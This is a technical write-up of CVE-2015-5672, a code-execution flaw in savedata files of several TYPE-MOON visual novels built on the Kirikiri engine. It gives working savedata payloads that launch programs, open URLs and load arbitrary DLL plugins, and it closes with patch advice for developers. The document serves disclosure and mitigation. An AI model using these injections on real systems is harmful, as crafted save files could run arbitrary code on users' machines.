CVE-2015-5672 is a code execution exploit which can be used by specially-crafted savedata files. This exploit was reported to TYPE-MOON by Kazuhiko Kusano, but they did not release a patch because it is "difficult to solve with a new patch" (see section The fix for this security hole)
- Fate/stay night (CD版、DVD版)
- Fate/hollow ataraxia
- 魔法使いの夜 (aka Mahoyo; Mahoutsukai no Yoru; Witch on the Holy Night)
- Fate/stay night + hollow ataraxia (セット版)
In addition to the above, I have confirmed that this issue still occurs in the following:
- Fate/stay night+hollow ataraxia復刻版 (2019年6月28日 DMM DL version)
It is possible to open URLs using this exploit.
To open URLs:
In the savedata
folder, in datasc.ksd
, save the following contents as UTF-16 with BOM:
%["hoge" => System.shellExecute("https://gist.github.com/uyjulian/ffb0cfdab167ade707e2ae8e7fe35e5c")]
After doing that, open the game. This page should appear in a browser window.
It is possible to run executables or open files.
To do that:
In the savedata
folder, in datasc.ksd
, save the following contents as UTF-16 with BOM:
%["hoge" => System.shellExecute("calc.exe")]
After doing that, open the game. The "Calculator" program should appear.
You can also pass arguments:
%["hoge" => System.shellExecute("start.exe", "https://gist.github.com/uyjulian/ffb0cfdab167ade707e2ae8e7fe35e5c")]
After doing that, open the game. This webpage should appear.
%["hoge" => System.shellExecute("https://gist.github.com/uyjulian/ffb0cfdab167ade707e2ae8e7fe35e5c")]
Sometimes, you cannot load plugins into Kirikiri due to cxdec validation or tpm autoloading being disabled. However, there is a workaround for this.
With CVE-2015-5672, it is possible to run arbitary TJS code in savedata files.
In the savedata
folder, in datasc.ksd
, save the following contents as UTF-16 with BOM:
%["hoge" => Plugins.link("pluginname.dll")]
Replace pluginname.dll
with the name of your plugin that is in the same directory as the executable. (You can also use an absolute path)
After doing that, open the game. Your desired plugin is now loaded.
本件問題は新たなパッチで解決することが困難であり
Actually, it is easy to solve this with a patch.
If you are using Kirikiri Z 1.4.0.8 or later, you can do the following:
Use Dictionary.loadStruct
instead of Scripts.evalStorage
. This will prevent functions from being called.
If you are using Kirikiri 2 2.30 or later, you can do the following:
Load the file with Array.load
, join the string, wrap the string with (const)[
and ]
, use Scripts.eval
, then deindex at the 0th position.
When restoring KAG bookmarks, replace the contents of f.mainConductor.macros
, f.mainConductor.macroArgs
, and f.mainConductor.callStack[X].lineBuffer
with known good values as it is possible to inject TJS code.